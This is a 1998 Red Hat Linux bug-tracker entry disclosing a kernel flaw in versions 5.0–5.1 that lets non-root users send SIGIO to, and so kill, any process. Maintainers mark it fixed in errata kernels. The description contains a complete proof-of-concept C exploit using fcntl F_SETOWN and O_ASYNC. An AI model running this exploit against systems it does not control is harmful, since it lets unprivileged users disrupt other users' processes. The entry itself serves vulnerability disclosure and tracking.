Bug 78 - Rootshell reported bug, shits.c
Summary: Rootshell reported bug, shits.c
Keywords:
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: basesystem
Version: 5.0
Hardware: i386
OS: Linux
high
medium
Target Milestone: ---
Assignee: David Lawrence
QA Contact:
URL:
Whiteboard:
: 79 91 243 (view as bug list)
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1998-11-15 16:13 UTC by penguin
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1998-11-16 14:08:43 UTC


Attachments (Terms of Use)

Description penguin 1998-11-15 16:13:46 UTC
Allows anyone to kill any process - even if not root.
Effects 5.0 and 5.1,  have not tested on 5.2
---
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
int s, p;
if (argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}

Comment 1 Bill Nottingham 1998-11-16 13:51:59 UTC
*** Bug 80 has been marked as a duplicate of this bug. ***

Comment 2 Bill Nottingham 1998-11-16 13:52:59 UTC
*** Bug 79 has been marked as a duplicate of this bug. ***

Comment 3 Preston Brown 1998-11-16 14:08:59 UTC
This was a kernel bug, and has been fixed in the latest errata kernel releases
for 5.x.  Or, you can upgrade to 5.2.

Comment 4 Bill Nottingham 1998-11-16 16:04:59 UTC
*** Bug 91 has been marked as a duplicate of this bug. ***

Comment 5 Preston Brown 1998-11-23 12:21:59 UTC
*** Bug 165 has been marked as a duplicate of this bug. ***

Comment 6 Bill Nottingham 1998-12-01 03:37:59 UTC
*** Bug 243 has been marked as a duplicate of this bug. ***


Note You need to log in before you can comment on or make changes to this bug.